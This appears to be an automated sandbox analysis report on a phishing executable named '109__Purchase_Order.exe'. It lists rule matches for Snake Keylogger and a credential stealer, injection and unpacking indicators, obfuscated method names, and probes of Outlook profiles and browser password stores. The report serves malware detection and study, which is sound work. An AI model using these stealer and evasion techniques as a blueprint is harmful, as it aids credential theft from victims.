Source: 0.2.109__Purchase_Order.exe.442b100.9.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.109__Purchase_Order.exe.444b920.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.109__Purchase_Order.exe.444b920.7.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.109__Purchase_Order.exe.444b920.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.109__Purchase_Order.exe.444b920.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 2.2.109__Purchase_Order.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.109__Purchase_Order.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.109__Purchase_Order.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.109__Purchase_Order.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.109__Purchase_Order.exe.444b920.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.109__Purchase_Order.exe.444b920.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.109__Purchase_Order.exe.444b920.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.109__Purchase_Order.exe.442b100.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.109__Purchase_Order.exe.442b100.9.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.109__Purchase_Order.exe.442b100.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000002.00000002.4074742141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000002.4074742141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.1691234350.000000000435E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1691234350.000000000435E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: 109__Purchase_Order.exe PID: 7304, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: 109__Purchase_Order.exe PID: 7304, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: 109__Purchase_Order.exe PID: 7532, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: 109__Purchase_Order.exe PID: 7532, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: 109__Purchase_Order.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.109__Purchase_Order.exe.442b100.9.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.109__Purchase_Order.exe.442b100.9.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.109__Purchase_Order.exe.442b100.9.raw.unpack, ----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.109__Purchase_Order.exe.442b100.9.raw.unpack, ----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.109__Purchase_Order.exe.444b920.7.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.109__Purchase_Order.exe.444b920.7.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.109__Purchase_Order.exe.444b920.7.raw.unpack, ----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.109__Purchase_Order.exe.444b920.7.raw.unpack, ----.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, HOW2huMWuH24JAKIss.cs	Security API names: _0020.SetAccessControl
Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, HOW2huMWuH24JAKIss.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, HOW2huMWuH24JAKIss.cs	Security API names: _0020.AddAccessRule
Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, c7G1s7QBOOZM36BDQn.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, HOW2huMWuH24JAKIss.cs	Security API names: _0020.SetAccessControl
Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, HOW2huMWuH24JAKIss.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, HOW2huMWuH24JAKIss.cs	Security API names: _0020.AddAccessRule
Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, c7G1s7QBOOZM36BDQn.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: 0.2.109__Purchase_Order.exe.320063c.1.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.109__Purchase_Order.exe.31bc8e8.0.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.109__Purchase_Order.exe.71f0000.10.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.109__Purchase_Order.exe.31b48d0.4.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/1@4/4

Source: C:\Users\user\Desktop\109__Purchase_Order.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\109__Purchase_Order.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\109__Purchase_Order.exe

Mutant created: NULL

Source: 109__Purchase_Order.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 109__Purchase_Order.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\109__Purchase_Order.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 109__Purchase_Order.exe, 00000002.00000002.4075654635.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.00000000032DC000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.00000000032EC000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 109__Purchase_Order.exe

ReversingLabs: Detection: 39%

Source: unknown	Process created: C:\Users\user\Desktop\109__Purchase_Order.exe "C:\Users\user\Desktop\109__Purchase_Order.exe"
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process created: C:\Users\user\Desktop\109__Purchase_Order.exe "C:\Users\user\Desktop\109__Purchase_Order.exe"
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Process created: C:\Users\user\Desktop\109__Purchase_Order.exe "C:\Users\user\Desktop\109__Purchase_Order.exe"	Jump to behavior

Source: C:\Users\user\Desktop\109__Purchase_Order.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\109__Purchase_Order.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\109__Purchase_Order.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: 109__Purchase_Order.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 109__Purchase_Order.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: 109__Purchase_Order.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: ENYy.pdb source: 109__Purchase_Order.exe
Source:	Binary string: ENYy.pdbSHA256y1 source: 109__Purchase_Order.exe

Data Obfuscation

.NET source code contains potential unpacker

Source: 109__Purchase_Order.exe, Home.cs	.Net Code: InitializeComponent
Source: 0.2.109__Purchase_Order.exe.7230000.11.raw.unpack, nL.cs	.Net Code: sf
Source: 0.2.109__Purchase_Order.exe.7230000.11.raw.unpack, nL.cs	.Net Code: wb System.Reflection.Assembly.Load(byte[])
Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, HOW2huMWuH24JAKIss.cs	.Net Code: GXbCksB79k System.Reflection.Assembly.Load(byte[])
Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, HOW2huMWuH24JAKIss.cs	.Net Code: GXbCksB79k System.Reflection.Assembly.Load(byte[])
Source: 0.2.109__Purchase_Order.exe.31a3158.3.raw.unpack, nL.cs	.Net Code: sf
Source: 0.2.109__Purchase_Order.exe.31a3158.3.raw.unpack, nL.cs	.Net Code: wb System.Reflection.Assembly.Load(byte[])

Source: 109__Purchase_Order.exe

Static PE information: 0x9C6E185A [Sat Mar 1 16:54:50 2053 UTC]

Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Code function: 0_2_05BAA410 pushad ; retf		0_2_05BAA419
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Code function: 2_2_02F09770 push esp; ret		2_2_02F09771

Source: 109__Purchase_Order.exe

Static PE information: section name: .text entropy: 7.962304539562137

Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, ofMc7kSjLqFQ721OW8.cs	High entropy of concatenated method names: 'kq1X59TDiD', 'qT9XqZBD2t', 'uYsXdqUql7', 'deJXTDhgBP', 'WCtX96obJj', 'R3JXK0LZG1', 'wMhXHf1hBx', 'gaRXj23cY9', 'xUZXnIvGxw', 'rHJXW594AT'
Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, HOW2huMWuH24JAKIss.cs	High entropy of concatenated method names: 'r9ZF1a7g7W', 'auXF5286Mj', 'X5VFqxmeSt', 'SqXFd0Utof', 'W6EFTl8nev', 'AAsF9Rjvep', 'kdlFKIlVtm', 'IYVFHdWnfY', 'nerFjUsNGW', 'BrOFncMRT0'
Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, jcEPgTbuGk9a0DVG02.cs	High entropy of concatenated method names: 'BOcXYiC9yG', 'uplXuEX9D2', 'aJWXfO63j1', 'AhDXhJXqol', 'BLUXtftJUc', 'lMtXMQ8Jso', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, evek6BLcvke2fGAw2F.cs	High entropy of concatenated method names: 'yMt4Jwqx4h', 'cpk4sUmUEa', 'Trp4YSIyAn', 'cZM4ue7rC8', 'QX94hMs9Yl', 'i6n4MG19Rj', 'VGt4P3qRwa', 'lwH4Bv6WUa', 'rJM4r4yfOG', 'eyH4pM2jV1'
Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, Gut9Ewn4ddg6joA4vi.cs	High entropy of concatenated method names: 'kkmK5e6m72', 'dI8Kd8m14s', 'TcQK9MLiSA', 'TXY9i7lASE', 'HGv9zh7XrD', 'amrKoxVnup', 'lnhKmvyLUM', 'F7SKat9JAJ', 'VRxKF4H5EI', 'O7xKCGMM9d'
Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, CQO8IbYU17tGjjxd23.cs	High entropy of concatenated method names: 'JopLm5AhXV', 'PAMLFLRSbE', 'T9RLCL821S', 'EUKL5HIMLr', 'eN6LqPltD0', 'DisLT70MDM', 'nPKL9lbg1o', 'iw3XNRhUIf', 'wwmX65lrFK', 'Dr0XZHFkEB'
Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, fnI6us3IgPBqmng04s.cs	High entropy of concatenated method names: 'mK09gfnDei', 'biA9yX4v0H', 'uh19kHoYg7', 'kMk9GEAqrY', 'uhe9Sti858', 'LCD98W5IdP', 'GXW9sLsi61', 'hiZ9wb6vI8', 'gp4F0p3i6hXbjGK7WNl', 'cZjWoi3OUHwoLByrQ7n'
Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, c7G1s7QBOOZM36BDQn.cs	High entropy of concatenated method names: 'A5cqtjFuvs', 'MeyqeyLVYw', 'A5dqbaTUbc', 'yAmqISDhZv', 'sL5qAA5hpK', 'wmiqOr0EVP', 'masqN1wmdU', 'cLnq6fgI7n', 'WoqqZyVamO', 'aVlqisR6BB'
Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, IbXF8jBrWJjZpHVyg7N.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'luJQtAbrIF', 'QpeQeagT3s', 'xraQbMnGQJ', 'fyGQIY3fkO', 'TguQAEoJQt', 'nbTQOvie8Y', 'y5jQN5dpn5'
Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, kBnWKD6s4FcdQnOKPq.cs	High entropy of concatenated method names: 'suAmKFr5ZH', 'tZQmHP2d0A', 'WLKmntGeg4', 'VVQmWM6Y2B', 'aZdmD9DQsv', 'TnHm2iou8o', 'KrOagMktLA5erNHZ9j', 'fWNCjY7rR60BgoIA8q', 'gDNmmZZx5K', 'LABmFTEiSo'
Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, Bs4Lti9JmpwTlEvneK.cs	High entropy of concatenated method names: 'fivdGKYb4s', 'bqZdS3IofQ', 'vKYdJhZi3f', 'n9odsJ5eRi', 'P6tdDSZkQw', 'L4nd2tlMfr', 'MiFdEp1PHZ', 'YXNdXAsOCD', 'YLndLb8WNs', 'FQTdQXGZUq'
Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, x42rRpoStLLHSoccQX.cs	High entropy of concatenated method names: 'H9WEnyNGhw', 'ih5EWcmA17', 'ToString', 'K9SE5K8CrZ', 'qKBEqJQTYJ', 'h6OEdHup9J', 'psSETFf6Rd', 'AnME9Dm1aM', 'HK5EK51tGp', 'PRuEHNZgJC'
Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, yxdkC1VeQpQ4MXEEFJ.cs	High entropy of concatenated method names: 'cpfk801If', 'EbdGj9HZ7', 'bN8S09euc', 'rYD8rWKbf', 'fJUsWjt8P', 'FPIw4SsxS', 'JD2rlOKPcQh2kfrgUh', 'Yr8gPZRIE5Pjgr8vwV', 'V7QX5qIsV', 'dNlQqOJ1N'
Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, OrOWP3BG8kwAgXb9pIp.cs	High entropy of concatenated method names: 'cYrLyVQSnC', 'HK3L0FsUVr', 'PS4Lkm9RLw', 'U03LG8glBu', 'dHELldMv3D', 'VVDLSDbhsj', 'a0wL8VliG3', 'fLCLJN8WUx', 'yOCLsy76YZ', 'q2WLwksSsD'
Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, fe8puFlDcqURUIC0vF.cs	High entropy of concatenated method names: 'pAsKyxXMQo', 'X3cK0JHe4r', 'HgQKkT08lX', 'H9WKGGtu5H', 'NUjKldvobk', 'WfvKSIfCM8', 'zSZK8aTF9f', 'froKJotanD', 'K9tKsYiNYD', 'WoyKwgllUo'
Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, shsLPlzoLrkYCdBPmM.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pt6L4W7iMw', 'glfLD7GMnL', 'ViuL2P6NZE', 'IkULEUso3e', 'S2RLX4CWRO', 'TnlLLi7m1L', 'V95LQ7asO1'
Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, gqS9nWwXBEY5Fr49ds.cs	High entropy of concatenated method names: 'YrY91Ko4QJ', 'z8r9qXnuHL', 'uxc9TVCLBZ', 'Erc9KOAG2O', 'XKr9HjwQlw', 'KG8TA5Hyi4', 'q2ETOEO6c2', 'bKATNJSkmk', 'MRgT6jYBb7', 'VGQTZCsnAE'
Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, sGYLIBRP2UYPvkC8iu.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'WHraZ9EUJY', 'n64aiZob5Z', 'D9Aaz4cvov', 'UTjFoPytLF', 'RjBFmtCN41', 'zfbFap0Q4e', 'zxgFFDOt0W', 'EfQfxsJcb6OWPNPihSq'
Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, Y1x70KpXwX06bg0SJN.cs	High entropy of concatenated method names: 'ToString', 'uvD2pBdY6O', 'lrX2u3PfO4', 'TJP2fdWpyj', 'yv82hCfc9h', 'nJq2M0QZK6', 'pe523OwpAy', 'dY22P8YM4d', 'Ghm2BvZIBo', 'so72RoxdHy'
Source: 0.2.109__Purchase_Order.exe.7740000.12.raw.unpack, S2gI0tJTis4pOlOImq.cs	High entropy of concatenated method names: 'Dispose', 'GHnmZdayLT', 'MJBauUv4OB', 'i9D77uqY2K', 'M4smi9nM1t', 'YftmzwlvxG', 'ProcessDialogKey', 'zNEaobqWC0', 'xndamBaBPa', 'NHdaaTudBH'
Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, ofMc7kSjLqFQ721OW8.cs	High entropy of concatenated method names: 'kq1X59TDiD', 'qT9XqZBD2t', 'uYsXdqUql7', 'deJXTDhgBP', 'WCtX96obJj', 'R3JXK0LZG1', 'wMhXHf1hBx', 'gaRXj23cY9', 'xUZXnIvGxw', 'rHJXW594AT'
Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, HOW2huMWuH24JAKIss.cs	High entropy of concatenated method names: 'r9ZF1a7g7W', 'auXF5286Mj', 'X5VFqxmeSt', 'SqXFd0Utof', 'W6EFTl8nev', 'AAsF9Rjvep', 'kdlFKIlVtm', 'IYVFHdWnfY', 'nerFjUsNGW', 'BrOFncMRT0'
Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, jcEPgTbuGk9a0DVG02.cs	High entropy of concatenated method names: 'BOcXYiC9yG', 'uplXuEX9D2', 'aJWXfO63j1', 'AhDXhJXqol', 'BLUXtftJUc', 'lMtXMQ8Jso', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, evek6BLcvke2fGAw2F.cs	High entropy of concatenated method names: 'yMt4Jwqx4h', 'cpk4sUmUEa', 'Trp4YSIyAn', 'cZM4ue7rC8', 'QX94hMs9Yl', 'i6n4MG19Rj', 'VGt4P3qRwa', 'lwH4Bv6WUa', 'rJM4r4yfOG', 'eyH4pM2jV1'
Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, Gut9Ewn4ddg6joA4vi.cs	High entropy of concatenated method names: 'kkmK5e6m72', 'dI8Kd8m14s', 'TcQK9MLiSA', 'TXY9i7lASE', 'HGv9zh7XrD', 'amrKoxVnup', 'lnhKmvyLUM', 'F7SKat9JAJ', 'VRxKF4H5EI', 'O7xKCGMM9d'
Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, CQO8IbYU17tGjjxd23.cs	High entropy of concatenated method names: 'JopLm5AhXV', 'PAMLFLRSbE', 'T9RLCL821S', 'EUKL5HIMLr', 'eN6LqPltD0', 'DisLT70MDM', 'nPKL9lbg1o', 'iw3XNRhUIf', 'wwmX65lrFK', 'Dr0XZHFkEB'
Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, fnI6us3IgPBqmng04s.cs	High entropy of concatenated method names: 'mK09gfnDei', 'biA9yX4v0H', 'uh19kHoYg7', 'kMk9GEAqrY', 'uhe9Sti858', 'LCD98W5IdP', 'GXW9sLsi61', 'hiZ9wb6vI8', 'gp4F0p3i6hXbjGK7WNl', 'cZjWoi3OUHwoLByrQ7n'
Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, c7G1s7QBOOZM36BDQn.cs	High entropy of concatenated method names: 'A5cqtjFuvs', 'MeyqeyLVYw', 'A5dqbaTUbc', 'yAmqISDhZv', 'sL5qAA5hpK', 'wmiqOr0EVP', 'masqN1wmdU', 'cLnq6fgI7n', 'WoqqZyVamO', 'aVlqisR6BB'
Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, IbXF8jBrWJjZpHVyg7N.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'luJQtAbrIF', 'QpeQeagT3s', 'xraQbMnGQJ', 'fyGQIY3fkO', 'TguQAEoJQt', 'nbTQOvie8Y', 'y5jQN5dpn5'
Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, kBnWKD6s4FcdQnOKPq.cs	High entropy of concatenated method names: 'suAmKFr5ZH', 'tZQmHP2d0A', 'WLKmntGeg4', 'VVQmWM6Y2B', 'aZdmD9DQsv', 'TnHm2iou8o', 'KrOagMktLA5erNHZ9j', 'fWNCjY7rR60BgoIA8q', 'gDNmmZZx5K', 'LABmFTEiSo'
Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, Bs4Lti9JmpwTlEvneK.cs	High entropy of concatenated method names: 'fivdGKYb4s', 'bqZdS3IofQ', 'vKYdJhZi3f', 'n9odsJ5eRi', 'P6tdDSZkQw', 'L4nd2tlMfr', 'MiFdEp1PHZ', 'YXNdXAsOCD', 'YLndLb8WNs', 'FQTdQXGZUq'
Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, x42rRpoStLLHSoccQX.cs	High entropy of concatenated method names: 'H9WEnyNGhw', 'ih5EWcmA17', 'ToString', 'K9SE5K8CrZ', 'qKBEqJQTYJ', 'h6OEdHup9J', 'psSETFf6Rd', 'AnME9Dm1aM', 'HK5EK51tGp', 'PRuEHNZgJC'
Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, yxdkC1VeQpQ4MXEEFJ.cs	High entropy of concatenated method names: 'cpfk801If', 'EbdGj9HZ7', 'bN8S09euc', 'rYD8rWKbf', 'fJUsWjt8P', 'FPIw4SsxS', 'JD2rlOKPcQh2kfrgUh', 'Yr8gPZRIE5Pjgr8vwV', 'V7QX5qIsV', 'dNlQqOJ1N'
Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, OrOWP3BG8kwAgXb9pIp.cs	High entropy of concatenated method names: 'cYrLyVQSnC', 'HK3L0FsUVr', 'PS4Lkm9RLw', 'U03LG8glBu', 'dHELldMv3D', 'VVDLSDbhsj', 'a0wL8VliG3', 'fLCLJN8WUx', 'yOCLsy76YZ', 'q2WLwksSsD'
Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, fe8puFlDcqURUIC0vF.cs	High entropy of concatenated method names: 'pAsKyxXMQo', 'X3cK0JHe4r', 'HgQKkT08lX', 'H9WKGGtu5H', 'NUjKldvobk', 'WfvKSIfCM8', 'zSZK8aTF9f', 'froKJotanD', 'K9tKsYiNYD', 'WoyKwgllUo'
Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, shsLPlzoLrkYCdBPmM.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pt6L4W7iMw', 'glfLD7GMnL', 'ViuL2P6NZE', 'IkULEUso3e', 'S2RLX4CWRO', 'TnlLLi7m1L', 'V95LQ7asO1'
Source: 0.2.109__Purchase_Order.exe.4496410.8.raw.unpack, gqS9nWwXBEY5Fr49ds.cs	High entropy of concatenated method names: 'YrY91Ko4QJ', 'z8r9qXnuHL', 'uxc9TVCLBZ', 'Erc9KOAG2O', 'XKr9HjwQlw', 'KG8TA5Hyi4', 'q2ETOEO6c2', 'bKATNJSkmk', 'MRgT6jYBb7', 'VGQTZCsnAE'
